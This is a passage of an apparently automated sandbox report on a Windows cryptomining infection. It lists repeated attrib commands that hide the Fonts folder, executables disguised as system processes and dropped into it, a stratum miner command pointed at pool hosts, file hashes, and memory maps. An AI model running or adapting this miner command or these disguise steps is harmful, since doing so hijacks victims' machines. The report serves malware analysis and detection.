C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
-
\??\c:\windows\Fonts\rundlls.exe"rundlls" -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash2⤵
- Detected Stratum cryptominer command
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\tem.vbsFilesize
215B
MD5535a478cc80a0fbbf990eed73f8788bb
SHA1459479dadaf00f3fa0de78f640c34dd426fd61aa
SHA256323a4134deb72847221aa880fffefe4c191d73bc69b4d246a5e9afb57dba6c51
SHA5123c96197cc51766f9d28fd69800865c88d015d50713a2aea6d71c097c6f4b0851535790f6adac51064b9b87c68dba268843ebb74a3da372dcc47eb39870ebdad1
-
C:\Windows\Fonts\conhost.exeFilesize
2.9MB
MD51b9583c6c3eab1da961aec9e42bfbcb8
SHA1c60f85fa6bcc463b3d38b7714916b241f2139650
SHA2566260081aae673484638c99635bdc23513a8ac5b1c89d78de78f0356b6ca30380
SHA5120bec2663078ef087412d69c46d8e73fd015976fc7fee009e10922ec75e9d9d1a9880c042e487eb0708842c948819581837d672abfcc0cceb211519eeecf516b4
-
C:\Windows\Fonts\rundlls.exeFilesize
5.2MB
MD5ed499b3a95e11ecf57e5131cd82c2a14
SHA17f37e85068457497f5f34e73edde4963694cfc19
SHA256c91015e3342a922219ed485fefb77181844fd7a38d671d0c41fe21c3274887f5
SHA512f6dfbde51caa1aeea30b1e35aca9f7695805ba99fa97ded53f8a08f19cf578e6a5d5ef1169bdd3144528d574ca887c8a1d786245a8c9bdffd45387f285f47fd0
-
C:\Windows\Fonts\svchost.exeFilesize
87KB
MD5c945fa7d5ecb219c248ea09ea3bbe8e4
SHA18a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA2566dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA5123e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b
-
C:\Windows\Fonts\svchost.exeFilesize
87KB
MD5c945fa7d5ecb219c248ea09ea3bbe8e4
SHA18a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA2566dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA5123e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b
-
C:\Windows\Fonts\svchost.exeFilesize
87KB
MD5c945fa7d5ecb219c248ea09ea3bbe8e4
SHA18a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA2566dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA5123e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b
-
C:\Windows\Fonts\svchost.exeFilesize
87KB
MD5c945fa7d5ecb219c248ea09ea3bbe8e4
SHA18a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA2566dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA5123e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b
-
C:\Windows\Fonts\svchost.exeFilesize
87KB
MD5c945fa7d5ecb219c248ea09ea3bbe8e4
SHA18a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA2566dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA5123e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b
-
C:\Windows\Fonts\svchost.exeFilesize
87KB
MD5c945fa7d5ecb219c248ea09ea3bbe8e4
SHA18a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA2566dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA5123e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b
-
C:\Windows\Fonts\svchost.exeFilesize
87KB
MD5c945fa7d5ecb219c248ea09ea3bbe8e4
SHA18a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA2566dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA5123e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b
-
C:\Windows\Fonts\svchost.exeFilesize
87KB
MD5c945fa7d5ecb219c248ea09ea3bbe8e4
SHA18a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA2566dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA5123e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b
-
C:\Windows\Fonts\svchost.exeFilesize
87KB
MD5c945fa7d5ecb219c248ea09ea3bbe8e4
SHA18a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA2566dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA5123e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b
-
C:\Windows\Fonts\svchost.exeFilesize
87KB
MD5c945fa7d5ecb219c248ea09ea3bbe8e4
SHA18a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA2566dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA5123e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b
-
C:\Windows\Fonts\svchost.exeFilesize
87KB
MD5c945fa7d5ecb219c248ea09ea3bbe8e4
SHA18a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA2566dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA5123e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b
-
C:\Windows\TEMP\csonhost.batFilesize
6KB
MD59da29265b1391c18f00c959c64b3fb65
SHA1dee2f9ded1706933f452ebcd2d5ccd8818af713e
SHA256fcf3e0486e76ea956d81dedfc64eaeb597ed0459d4356221f8f1e7f18d996824
SHA5126d9df7132fd07c8de64501d7df5ecc421f801724e6c854952a627aead0702e452fd366e439542e24960415c58145cf99c1231ac41815f7fece394d24a39260e2
-
\??\PIPE\srvsvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\srvsvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\srvsvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\c:\windows\Fonts\conhost.exeFilesize
2.9MB
MD51b9583c6c3eab1da961aec9e42bfbcb8
SHA1c60f85fa6bcc463b3d38b7714916b241f2139650
SHA2566260081aae673484638c99635bdc23513a8ac5b1c89d78de78f0356b6ca30380
SHA5120bec2663078ef087412d69c46d8e73fd015976fc7fee009e10922ec75e9d9d1a9880c042e487eb0708842c948819581837d672abfcc0cceb211519eeecf516b4
-
\??\c:\windows\Fonts\svchost.exeFilesize
87KB
MD5c945fa7d5ecb219c248ea09ea3bbe8e4
SHA18a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA2566dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA5123e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b
-
\Windows\Fonts\rundlls.exeFilesize
5.2MB
MD5ed499b3a95e11ecf57e5131cd82c2a14
SHA17f37e85068457497f5f34e73edde4963694cfc19
SHA256c91015e3342a922219ed485fefb77181844fd7a38d671d0c41fe21c3274887f5
SHA512f6dfbde51caa1aeea30b1e35aca9f7695805ba99fa97ded53f8a08f19cf578e6a5d5ef1169bdd3144528d574ca887c8a1d786245a8c9bdffd45387f285f47fd0
-
\Windows\Fonts\svchost.exeFilesize
87KB
MD5c945fa7d5ecb219c248ea09ea3bbe8e4
SHA18a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA2566dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA5123e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b
-
\Windows\Fonts\svchost.exeFilesize
87KB
MD5c945fa7d5ecb219c248ea09ea3bbe8e4
SHA18a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA2566dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA5123e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b
-
\Windows\Fonts\svchost.exeFilesize
87KB
MD5c945fa7d5ecb219c248ea09ea3bbe8e4
SHA18a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA2566dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA5123e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b
-
\Windows\Fonts\svchost.exeFilesize
87KB
MD5c945fa7d5ecb219c248ea09ea3bbe8e4
SHA18a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA2566dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA5123e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b
-
\Windows\Fonts\svchost.exeFilesize
87KB
MD5c945fa7d5ecb219c248ea09ea3bbe8e4
SHA18a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA2566dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA5123e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b
-
memory/268-81-0x0000000000000000-mapping.dmp
-
memory/268-97-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/268-104-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/272-77-0x0000000000000000-mapping.dmp
-
memory/328-80-0x0000000000000000-mapping.dmp
-
memory/328-98-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/384-73-0x0000000000000000-mapping.dmp
-
memory/384-117-0x0000000000000000-mapping.dmp
-
memory/392-92-0x0000000000000000-mapping.dmp
-
memory/392-106-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/520-123-0x0000000000000000-mapping.dmp
-
memory/560-63-0x0000000000000000-mapping.dmp
-
memory/580-114-0x0000000000000000-mapping.dmp
-
memory/580-64-0x0000000000000000-mapping.dmp
-
memory/604-75-0x0000000000000000-mapping.dmp
-
memory/624-57-0x0000000000000000-mapping.dmp
-
memory/632-102-0x0000000000000000-mapping.dmp
-
memory/632-67-0x0000000000000000-mapping.dmp
-
memory/688-76-0x0000000000000000-mapping.dmp
-
memory/696-91-0x0000000000000000-mapping.dmp
-
memory/772-90-0x0000000000000000-mapping.dmp
-
memory/832-70-0x0000000000000000-mapping.dmp
-
memory/840-121-0x0000000000000000-mapping.dmp
-
memory/896-56-0x0000000000000000-mapping.dmp
-
memory/904-78-0x0000000000000000-mapping.dmp
-
memory/940-122-0x0000000000000000-mapping.dmp
-
memory/972-72-0x0000000000000000-mapping.dmp
-
memory/996-119-0x0000000000000000-mapping.dmp
-
memory/1108-111-0x0000000000000000-mapping.dmp
-
memory/1168-68-0x0000000000000000-mapping.dmp
-
memory/1216-59-0x0000000000000000-mapping.dmp
-
memory/1216-88-0x0000000000000000-mapping.dmp
-
memory/1280-112-0x0000000000000000-mapping.dmp
-
memory/1352-125-0x0000000000000000-mapping.dmp
-
memory/1392-99-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/1392-85-0x0000000000000000-mapping.dmp
-
memory/1392-154-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/1412-127-0x0000000000000000-mapping.dmp
-
memory/1412-74-0x0000000000000000-mapping.dmp
-
memory/1436-69-0x0000000000000000-mapping.dmp
-
memory/1460-65-0x0000000000000000-mapping.dmp
-
memory/1488-118-0x0000000000000000-mapping.dmp
-
memory/1516-128-0x0000000000400000-0x0000000000809000-memory.dmpFilesize
4.0MB
-
memory/1516-95-0x0000000000250000-0x00000000002A3000-memory.dmpFilesize
332KB
-
memory/1516-54-0x00000000755A1000-0x00000000755A3000-memory.dmpFilesize
8KB
-
memory/1516-94-0x0000000000400000-0x0000000000809000-memory.dmpFilesize
4.0MB
-
memory/1544-71-0x0000000000000000-mapping.dmp
-
memory/1556-124-0x0000000000000000-mapping.dmp
-
memory/1600-115-0x0000000000000000-mapping.dmp
-
memory/1640-132-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/1640-168-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/1652-66-0x0000000000000000-mapping.dmp
-
memory/1720-116-0x0000000000000000-mapping.dmp
-
memory/1784-55-0x0000000000000000-mapping.dmp
-
memory/1796-131-0x0000000000400000-0x0000000000DEF000-memory.dmpFilesize
9.9MB
-
memory/1796-167-0x0000000000400000-0x0000000000DEF000-memory.dmpFilesize
9.9MB
-
memory/1796-108-0x0000000000000000-mapping.dmp
-
memory/1804-58-0x0000000000000000-mapping.dmp
-
memory/1960-126-0x0000000000000000-mapping.dmp
-
memory/1960-62-0x0000000000000000-mapping.dmp
-
memory/1984-113-0x0000000000000000-mapping.dmp
-
memory/1984-89-0x0000000000000000-mapping.dmp
-
memory/2020-103-0x0000000000000000-mapping.dmp
-
memory/2028-120-0x0000000000000000-mapping.dmp
-
memory/2028-61-0x0000000000000000-mapping.dmp
-
memory/2032-60-0x0000000000000000-mapping.dmp
-
memory/2044-105-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/2044-82-0x0000000000000000-mapping.dmp
-
memory/2044-100-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/2120-133-0x0000000000000000-mapping.dmp
-
memory/2132-153-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/2132-134-0x0000000000000000-mapping.dmp
-
memory/2152-135-0x0000000000000000-mapping.dmp
-
memory/2152-151-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/2180-152-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/2180-137-0x0000000000000000-mapping.dmp
-
memory/2204-155-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/2204-139-0x0000000000000000-mapping.dmp
-
memory/2204-163-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/2232-143-0x0000000000000000-mapping.dmp
-
memory/2276-145-0x0000000000000000-mapping.dmp
-
memory/2336-149-0x0000000000000000-mapping.dmp
-
memory/2348-169-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/2348-158-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/2432-157-0x0000000000000000-mapping.dmp
-
memory/2432-160-0x0000000000080000-0x00000000000A0000-memory.dmpFilesize
